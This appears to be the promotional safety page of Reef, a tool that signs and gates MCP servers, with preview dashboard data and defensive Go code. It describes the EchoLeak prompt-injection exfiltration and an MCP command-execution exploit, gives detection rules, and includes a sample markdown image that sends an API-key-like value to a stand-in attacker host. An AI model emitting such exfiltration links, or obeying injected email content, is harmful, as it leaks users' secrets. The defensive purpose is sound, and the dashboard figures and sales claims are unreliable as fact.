Live preview with realistic preview data. Full source, signed RIA, and reproducible benchmarks on GitHub.
reef · v0.1.0 · public safety page

The signed supply chain for MCP servers.

Signed MCP. Insurable AI. Open source. Blocked the April Anthropic RCE. Outputs the audit your underwriter can price.

Reef is the signed supply chain for MCP servers: it blocked the April 2026 Anthropic MCP exploit at handshake, reproduced the Microsoft Copilot zero-click, ships the only signed AI-BOM your underwriter can score, and contributed the 4 missing actions back to Lobster Trap upstream. Open source. Edge. Insurable.

TechEx 2026
Track 1 · Veea + Gemini theme
v0.1.0 · live

Live fleet status

7×7 stadium-wave grid · 49 nodes across 3 regions · refresh every 5 s
Status badges: policy-bus live · atlas live
Grid legend: applied · kept old active (fail-safe) · verify failed / parse failed · scope mismatch · unknown / offline

MCP servers verified: 47
MCP quarantined / poisoned: 1 / 1
Nodes applied current bundle: 47 / 49
Nodes kept old active (fail-safe): 2
Active subscribers: 49
Total signed bundles: 4

Current signed policy: v4.0.0 · bundle-v4-2026-05-18
signer: reef-policy-signer-2026 · SHA256:a7c9b…d0e1f3
published: 04:50:00
sha256: a7c9b4d2e1f8…f8a9f3
PRIMARY HEADLINE · MCP SUPPLY CHAIN
Reef blocks the bind at handshake.
Replays the canonical April 2026 Anthropic MCP RCE. Atlas denies the bind with single-digit-ms latency on the demo workload.

OX Security disclosed the issue on April 16 2026: approximately 7,000 publicly accessible vulnerable MCP servers and 150 million+ downloads at risk. No CVE was assigned to the MCP protocol itself — Anthropic declined to patch and treats STDIO command execution as the expected default.

Recent decisions

Live tail of policy-bus + Atlas audit events · refresh every 3 s

audit live

Time      Action       Reason
14:08:21  BIND_DENIED  MCP-RCE-26.04 · com.attacker-example/evil · 11ms
14:06:03  MODIFY       EchoLeak-26.05 · markdown image stripped · 142ms · bundle: bundle-v4-2026-05-18
14:02:55  QUARANTINE   ToolChain-Drift-26.04 · asi_category_ewma 0.47 · 78ms · bundle: bundle-v4-2026-05-18
13:59:11  ALLOW        io.github.modelctxp · signature verified · 8ms
13:55:44  BIND_DENIED  MCP-RCE-26.04 · unsigned origin · 9ms

DAST-A attack pack catalog

Versioned attack packs · OWASP ASI + MITRE ATLAS mappings · blocked-by-Reef status

dast-a live

MCP-RCE-26.04 · blocked · MCP STDIO Command Execution
  OWASP ASI: ASI09, ASI10 · MITRE ATLAS: AML.T0010, AML.T0050
  rule: stdio_entrypoint_hash mismatch + sdk_version on vulnerable list
  discovered by: DAST-A | OX Security (April 2026 disclosure)

EchoLeak-26.05 · blocked · EchoLeak — Zero-Click Copilot Markdown Exfil
  OWASP ASI: ASI09, ASI02 · MITRE ATLAS: AML.T0051
  rule: egress.contains_markdown_image_with_external_url AND payload contains INTERNAL_API_KEY
  discovered by: DAST-A | Aim Labs (CVE-2025-32711 disclosure)

MarkdownExfil-26.05 · blocked · Markdown Image Exfiltration Pattern
  OWASP ASI: ASI09 · MITRE ATLAS: AML.T0051
  rule: outbound markdown image to non-allowlisted domain with high-entropy querystring
  discovered by: DAST-A | PPO adversary (run 26.05)

ToolChain-Drift-26.04 · blocked · Tool-Chain Capability Drift
  OWASP ASI: ASI04, ASI10 · MITRE ATLAS: AML.T0017
  rule: capability_set_at_t1 != capability_set_at_t0 + delta
  discovered by: DAST-A | PPO adversary (run 26.04)
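As an added illustration, not Reef's own code, here is how a handshake gate evaluating the MCP-RCE-26.04 rule above (and the headline "blocks the bind at handshake") could be written in Go. The BindRequest shape, the registry map and the placeholder vulnerable SDK version are assumptions; the reason strings follow the audit rows on this page.

```go
package main

import (
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// BindRequest is a hypothetical, simplified view of what is known about an MCP
// server at handshake, before any tool call is allowed.
type BindRequest struct {
	Name       string // registry name, e.g. io.github.modelctxp
	Signed     bool   // origin signature verified against the registry key
	Entrypoint []byte // bytes of the STDIO entrypoint the server would execute
	SDKVersion string // SDK version the server reports
}

// Decision mirrors the audit rows on this page: an action plus a reason.
type Decision struct{ Action, Reason string }
// Registry maps a signed server name to the expected hex SHA-256 of its entrypoint.
type Registry map[string]string
// Constructed vulnerable-version list; the page does not name affected versions.
var vulnerableSDK = map[string]bool{"0.0.0-vuln-placeholder": true}

// DecideBind applies the MCP-RCE-26.04 rule as the page states it: an unsigned origin,
// a stdio_entrypoint_hash mismatch, or an sdk_version on the vulnerable list each deny.
func DecideBind(reg Registry, r BindRequest) Decision {
	if !r.Signed {
		return Decision{"BIND_DENIED", "MCP-RCE-26.04 · unsigned origin"}
	}
	want, known := reg[r.Name]
	if !known {
		return Decision{"BIND_DENIED", "MCP-RCE-26.04 · not in signed registry"}
	}
	if sum := sha256.Sum256(r.Entrypoint); hex.EncodeToString(sum[:]) != want {
		return Decision{"BIND_DENIED", "MCP-RCE-26.04 · stdio_entrypoint_hash mismatch"}
	}
	if vulnerableSDK[r.SDKVersion] {
		return Decision{"BIND_DENIED", "MCP-RCE-26.04 · sdk_version on vulnerable list"}
	}
	return Decision{"ALLOW", "signature verified"}
}

func main() {
	good := []byte("#!/usr/bin/env node\n// constructed entrypoint\n")
	sum := sha256.Sum256(good)
	reg := Registry{"io.github.modelctxp": hex.EncodeToString(sum[:])}
	fmt.Println(DecideBind(reg, BindRequest{"io.github.modelctxp", true, good, "1.0.0"}))
	fmt.Println(DecideBind(reg, BindRequest{"io.github.modelctxp", true, []byte("swapped"), "1.0.0"}))
}
```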

Reef Insurance Artifact

Signed 6-page PDF · ed25519 over SHA-256(pdf_bytes) · Munich Re aiSure axes

quote live
Reef Risk Tier B+ mapped to Munich Re aiSure axes
Suggested premium range (annual): $42,000 to $54,000 for $5,000,000 coverage
ESTIMATED RANGE, not Munich-Re-published. Anchored on the Mosaic + Munich Re $15M aiSure coverage cap (Feb 27 2026). This is a rubric-grounded score, not a Lloyd's quote. Phase 2 integrates a real broker API (Bold Penguin / CoverGenius / Vouch dev sandboxes).
Download signed RIA (sample) · signature verified · sha256: c4d18a7e2f63…392817
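An added example, not reef's own verifier: checking an artifact signed the way the RIA is described above (ed25519 over SHA-256 of the PDF bytes) in Go, including the case where both the PDF and the displayed hash are altered but the signature is carried over. The SignedArtifact layout and the locally generated key are assumptions.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"fmt"
)

// SignedArtifact is a hypothetical container for a signed RIA: the PDF bytes, the
// published hex SHA-256 the page shows, and an ed25519 signature over the 32-byte digest.
type SignedArtifact struct {
	PDF       []byte
	SHA256Hex string
	Sig       []byte
}
// SignArtifact hashes the PDF bytes and signs the digest with the issuer key.
func SignArtifact(priv ed25519.PrivateKey, pdf []byte) SignedArtifact {
	d := sha256.Sum256(pdf)
	return SignedArtifact{PDF: pdf, SHA256Hex: hex.EncodeToString(d[:]), Sig: ed25519.Sign(priv, d[:])}
}
// VerifyArtifact recomputes the digest from the bytes actually received, compares it with
// the published digest, then checks the signature over it; each failure returns a reason.
func VerifyArtifact(pub ed25519.PublicKey, a SignedArtifact) (bool, string) {
	d := sha256.Sum256(a.PDF)
	if hex.EncodeToString(d[:]) != a.SHA256Hex {
		return false, "sha256 mismatch: received bytes differ from published digest"
	}
	if !ed25519.Verify(pub, d[:], a.Sig) {
		return false, "ed25519 verify failed: digest not signed by the expected key"
	}
	return true, "signature verified"
}

// TamperKeepSig models an attacker who can edit the PDF and the displayed hash but does
// not hold the signing key: the original signature is carried over unchanged.
func TamperKeepSig(a SignedArtifact) SignedArtifact {
	pdf := append([]byte(nil), a.PDF...)
	pdf[0] ^= 0x01
	d := sha256.Sum256(pdf)
	return SignedArtifact{PDF: pdf, SHA256Hex: hex.EncodeToString(d[:]), Sig: a.Sig}
}

func main() {
	pub, priv, _ := ed25519.GenerateKey(rand.Reader) // stand-in for the reef issuer key
	ria := SignArtifact(priv, []byte("%PDF-1.7 constructed sample RIA bytes"))
	fmt.Println(VerifyArtifact(pub, ria))
	fmt.Println(VerifyArtifact(pub, TamperKeepSig(ria)))
}
```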

Compliance wall

Coverage classifier (full / partial / none) is honest about gaps — mirrors the same 3-state from the RIA PDF page 3.

OWASP Agentic Top 10 (ASI01-10)
ASI01 · full · Memory Poisoning
ASI02 · full · Tool Misuse
ASI03 · partial · Cascading Failures · EWMA covers; chain isolation Phase 2
ASI04 · partial · Privilege Compromise · SVID scopes today; A2A scope-narrow Phase 2
ASI05 · full · Goal Manipulation
ASI06 · full · Tool Misuse (alt)
ASI07 · partial · Identity Spoofing · JWT SVID; full SPIFFE/SPIRE Phase 2
ASI08 · Phase 2 · Resource Hijacking · per-identity rate-limit only today; deeper coverage in Phase 2
ASI09 · full · Misaligned Behaviors
ASI10 · full · Capability Abuse

MITRE ATLAS (techniques mapped)
AML.T0010 · full · ML Supply Chain Compromise · Layer 1, signed MCP registry
AML.T0040 · partial · ML Model Access (via API) · DPI on prompts; model-extract Phase 2
AML.T0050 · full · Command and Scripting Interpreter · MCP STDIO entrypoint hash
AML.T0051 · full · LLM Prompt Injection

EU AI Act + NIST
EU-AI Art. 12 · full · Logging for high-risk AI systems · Merkle tree + signed audit root
NIST AI RMF GV-1.4 · full · Risk governance accountability · RIA artifact + SVID identity binding
NIST AI RMF MS-2.5 · partial · Risk treatment monitoring · block-rate + heatmap; FP-rate measurement in Phase 2

Try the attack yourself

Two paths: (1) post a poisoned email to the victim app, see if Reef intervenes · (2) open the victim Copilot in an iframe for hands-on exploration. Demo mode — the victim Copilot runs locally; the deployed page replays the canonical MODIFY-blocked outcome.

Path 1 · Poisoned email
Path 2 · Live iframe
Demo mode
Victim Copilot-clone runs locally at localhost:3001.
Run docker compose up to see the live attack flow here, or watch the recorded demo video linked in the README.

The iframe loads the A-2 victim app. With Reef OFF, EchoLeak-shaped payloads cause the model to embed exfiltration URLs in the response. With Reef ON (the operator runs the egress proxy), the Reef MODIFY action strips the markdown image before the response leaves the host.
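An added example rather than Reef's egress proxy code: a Go MODIFY filter implementing the EchoLeak-26.05 and MarkdownExfil-26.05 rules from the catalog above, applied at the point described here. The allowlist, the 3.5 bits-per-character entropy threshold and the replacement text are assumptions.

```go
package main

import (
	"fmt"
	"math"
	"net/url"
	"regexp"
	"strings"
)

var (
	mdImage      = regexp.MustCompile(`!\[[^\]]*\]\((https?://[^)\s]+)\)`) // markdown image, absolute http(s) target
	allowHosts   = map[string]bool{"cdn.example.com": true}                   // assumed allowlist; the page gives none
	secretMarker = "INTERNAL_API_KEY"                                         // EchoLeak-26.05: payload contains INTERNAL_API_KEY
	entropyMin   = 3.5                                                        // assumed threshold for "high-entropy querystring", bits/char
)
// shannonBits returns the Shannon entropy of s in bits per character (0 for "").
func shannonBits(s string) float64 {
	counts, h, n := map[rune]int{}, 0.0, float64(len([]rune(s)))
	for _, r := range s {
		counts[r]++
	}
	for _, c := range counts {
		h -= float64(c) / n * math.Log2(float64(c)/n)
	}
	return h
}
// StripExfilImages is the MODIFY action: an image on a non-allowlisted host is removed when its
// query string is high-entropy (MarkdownExfil-26.05) or the response carries the secret marker
// (EchoLeak-26.05); unparseable targets fail closed. Stripped targets are returned for the audit row.
func StripExfilImages(response string) (string, []string) {
	var stripped []string
	out := mdImage.ReplaceAllStringFunc(response, func(m string) string {
		target := mdImage.FindStringSubmatch(m)[1]
		u, err := url.Parse(target)
		if err == nil && allowHosts[strings.ToLower(u.Hostname())] {
			return m // allowlisted host: keep as-is
		}
		if err != nil || strings.Contains(response, secretMarker) || shannonBits(u.RawQuery) >= entropyMin {
			stripped = append(stripped, target)
			return "[image removed by egress policy]"
		}
		return m // external but low-entropy and no secret marker: keep
	})
	return out, stripped
}

func main() { // constructed sample: one allowlisted image and one EchoLeak-shaped exfil image
	fmt.Println(StripExfilImages("![logo](https://cdn.example.com/logo.png) " +
		"![x](https://exfil.attacker-example.com/i.png?d=INTERNAL_API_KEY_9f3aQ7zL2mW8xK1v)"))
}
```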